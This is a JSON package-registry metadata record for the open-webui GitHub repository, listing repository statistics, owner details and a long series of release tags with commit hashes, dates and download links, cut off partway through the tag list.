[{"id":10351847,"name":"github.com/open-webui/open-webui","ecosystem":"go","description":null,"homepage":null,"licenses":"other","normalized_licenses":["Other"],"repository_url":"https://github.com/open-webui/open-webui","keywords_array":[],"namespace":null,"versions_count":168,"first_release_published_at":"2024-02-23T03:34:09.000Z","latest_release_published_at":"2026-08-25T21:17:36.000Z","latest_release_number":"v0.11.1","last_synced_at":"2026-08-30T01:42:19.418Z","created_at":"2024-06-11T15:41:01.251Z","updated_at":"2026-08-30T01:42:19.418Z","registry_url":"https://pkg.go.dev/github.com/open-webui/open-webui","install_command":"go get github.com/open-webui/open-webui","documentation_url":"https://pkg.go.dev/github.com/open-webui/open-webui#section-documentation","metadata":{},"repo_metadata":{"id":199152863,"uuid":"701547123","full_name":"open-webui/open-webui","owner":"open-webui","description":"User-friendly AI Interface (Supports Ollama, OpenAI API, ...)","archived":false,"fork":false,"pushed_at":"2026-08-22T13:13:14.000Z","size":409036,"stargazers_count":149582,"open_issues_count":326,"forks_count":21818,"subscribers_count":651,"default_branch":"main","last_synced_at":"2026-08-22T19:45:51.996Z","etag":null,"topics":["ai","llm","llm-ui","llm-webui","llms","mcp","ollama","ollama-webui","open-webui","openai","openapi","rag","self-hosted","ui","webui"],"latest_commit_sha":null,"homepage":"https://openwebui.com","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/open-webui.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"docs/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":null,"gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":"CONTRIBUTOR_LICENSE_AGREEMENT","disclosure":null},"funding":{"github":"open-webui"}},"created_at":"2023-10-06T22:08:27.000Z","updated_at":"2026-08-22T19:12:28.000Z","dependencies_parsed_at":"2026-08-15T05:21:06.356Z","dependency_job_id":null,"html_url":"https://github.com/open-webui/open-webui","commit_stats":{"total_commits":4572,"total_committers":249,"mean_commits":18.36144578313253,"dds":0.3506124234470691,"last_synced_commit":"1d225dd804575af9ae5981528dfdce695f7f7040"},"previous_names":["ollama-webui/ollama-webui","open-webui/open-webui"],"tags_count":167,"template":false,"template_full_name":null,"purl":"pkg:github/open-webui/open-webui","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/open-webui","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36962911,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"open-webui","name":"Open WebUI","uuid":"158137808","kind":"organization","description":"On a mission to build the best AI user interface.","email":"support@openwebui.com","website":"https://openwebui.com","location":null,"twitter":"OpenWebUI","company":null,"icon_url":"https://avatars.githubusercontent.com/u/158137808?v=4","repositories_count":25,"last_synced_at":"2026-08-22T19:45:41.038Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/open-webui","funding_links":["https://github.com/sponsors/open-webui"],"total_stars":164651,"followers":5228,"following":0,"created_at":"2024-02-17T08:24:26.070Z","updated_at":"2026-08-22T19:45:41.055Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/open-webui","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/open-webui/repositories"},"tags":[{"name":"v0.11.0","sha":"f9590b8017199e56d5e953657e6498e3cef1d246","kind":"commit","published_at":"2026-07-27T09:30:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.11.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.11.0/manifests"},{"name":"v0.10.2","sha":"ecd48e2f718220a6400ecf49eafd4867a38feb10","kind":"commit","published_at":"2026-07-01T08:40:54.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.10.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"b711935dd57dbc223ebbf410175a8bbe7e4efafb","kind":"commit","published_at":"2026-06-29T19:38:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.10.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"4d2e13cf2bcc451b33bb6374bea4d2163e6cc94c","kind":"commit","published_at":"2026-06-29T19:17:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.10.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.10.0/manifests"},{"name":"v0.9.6","sha":"1a97751e376e00a1897bc3679215ae1c7bd8fd42","kind":"commit","published_at":"2026-06-02T02:09:44.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"3660bc00fd807deced3400a63bfa6db47811a3bb","kind":"commit","published_at":"2026-05-10T18:13:55.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"f51d2b026f1b0e7283b15f093412be8b67d24770","kind":"commit","published_at":"2026-05-09T07:50:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"adc9076d176679fd913c5dc44d0bd4d8f86d1fc3","kind":"commit","published_at":"2026-05-09T07:17:07.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"8dae237a0bfdac4b7f55b463b3e2769ea4b94a0b","kind":"commit","published_at":"2026-04-24T09:56:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"0a8a620fb6fd4c914494f56ac06475bd5f95a985","kind":"commit","published_at":"2026-04-21T10:45:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"f31768e20e5c6b4f6da0ef657877298b359936cf","kind":"commit","published_at":"2026-04-21T07:56:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.9.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.9.0/manifests"},{"name":"v0.8.12","sha":"9bd84258d09eefe7bf975878fb0e31a5dadfe0f8","kind":"commit","published_at":"2026-03-27T00:26:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.12/manifests"},{"name":"v0.8.11","sha":"4d058a125b17eb57212af5eab98d683548d546e3","kind":"commit","published_at":"2026-03-25T22:49:59.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.11/manifests"},{"name":"v0.8.10","sha":"e4e69a10ec08a725bf2ab3db499ef664f2bd7570","kind":"commit","published_at":"2026-03-09T00:09:43.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.10/manifests"},{"name":"v0.8.9","sha":"6c159a97b7efdfdbfa262ebd26823a2d695b561d","kind":"commit","published_at":"2026-03-08T02:56:22.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.9/manifests"},{"name":"v0.8.8","sha":"79f04379801622181ef9c591374a285eac4e1c4d","kind":"commit","published_at":"2026-03-02T23:32:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.8/manifests"},{"name":"v0.8.7","sha":"6137f7cb7ecda49d5fa6857c5e9fa8942dda6b23","kind":"commit","published_at":"2026-03-02T01:14:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.7/manifests"},{"name":"v0.8.6","sha":"9c9a18d6d4311ff246d5d1345d94581bf25c604b","kind":"commit","published_at":"2026-03-01T21:03:55.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"1ac3dd4a893e13803e7b889611303c4a7a5cc470","kind":"commit","published_at":"2026-02-23T09:26:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"2ed3055c42ae18e3372081c18629963b0e244a62","kind":"commit","published_at":"2026-02-23T07:58:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"b8112d72b95e480f946f0688bed29321b61e65af","kind":"commit","published_at":"2026-02-17T07:25:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"7c7fe443289c3d0307ebbcf320fb1d895c3ee79b","kind":"commit","published_at":"2026-02-16T07:37:13.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"883f1dda0f18fbe26aca7aed5a8804021a3685ca","kind":"commit","published_at":"2026-02-14T00:04:11.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"7a7a25766c3dc13fa85544a93d011e00b7c0b2b4","kind":"commit","published_at":"2026-02-12T23:42:25.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.8.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.8.0/manifests"},{"name":"v0.7.2","sha":"2b26355002064228e9b671339f8f3fb9d1fafa73","kind":"commit","published_at":"2026-01-10T21:00:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.7.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"f2a360cb87cc395a0195e1b57ff7272400db3bee","kind":"commit","published_at":"2026-01-09T20:57:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.7.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"6adde203cd292a9e3af9c64a2ae36b603fed096a","kind":"commit","published_at":"2026-01-09T18:51:34.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.7.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.7.0/manifests"},{"name":"v0.6.43","sha":"a7271532f8a38da46785afcaa7e65f9a45e7d753","kind":"commit","published_at":"2025-12-22T06:03:34.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.43","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.43","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.43","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.43","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.43/manifests"},{"name":"v0.6.42","sha":"d95f533214e3fe5beb5e41ec1f349940bc4c7043","kind":"commit","published_at":"2025-12-21T21:08:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.42","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.42","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.42","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.42","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.42/manifests"},{"name":"v0.6.41","sha":"6f1486ffd0cb288d0e21f41845361924e0d742b3","kind":"commit","published_at":"2025-12-02T22:28:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.41","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.41","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.41","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.41","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.41/manifests"},{"name":"v0.6.40","sha":"140605e660b8186a7d5c79fb3be6ffb147a2f498","kind":"commit","published_at":"2025-11-25T11:01:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.40","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.40","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.40","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.40","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.40/manifests"},{"name":"v0.6.39","sha":"9899293f050ad50ae12024cbebee7e018acd851e","kind":"commit","published_at":"2025-11-25T10:31:34.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.39","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.39","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.39","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.39","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.39/manifests"},{"name":"v0.6.38","sha":"e3faec62c58e3a83d89aa3df539feacefa125e0c","kind":"commit","published_at":"2025-11-24T12:00:31.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.38","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.38","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.38","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.38","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.38/manifests"},{"name":"v0.6.37","sha":"fe6783c16699911c7be17392596d579333fb110c","kind":"commit","published_at":"2025-11-24T03:10:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.37","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.37","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.37","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.37","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.37/manifests"},{"name":"v0.6.36","sha":"e0d5de16978786b8a7538adf1efcde5258f38faf","kind":"commit","published_at":"2025-11-06T21:45:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.36","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.36","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.36","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.36","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.36/manifests"},{"name":"v0.6.35","sha":"e85c7f79310f351672fe967a102396b6f3f5e88b","kind":"commit","published_at":"2025-11-06T18:40:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.35","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.35","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.35","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.35","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.35/manifests"},{"name":"v0.6.34","sha":"9ae06a3cac140673cb93895bab37846095e71059","kind":"commit","published_at":"2025-10-16T16:55:47.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.34","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.34","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.34","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.34","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.34/manifests"},{"name":"v0.6.33","sha":"8d7d79d54b9160425fc5050b3484bec40dd3b44e","kind":"commit","published_at":"2025-10-07T21:20:27.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.33","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.33/manifests"},{"name":"v0.6.32","sha":"37d1c85c996e1bdcd505e1e6d62b2f17acd8df23","kind":"commit","published_at":"2025-09-29T06:13:00.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.32","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.32","de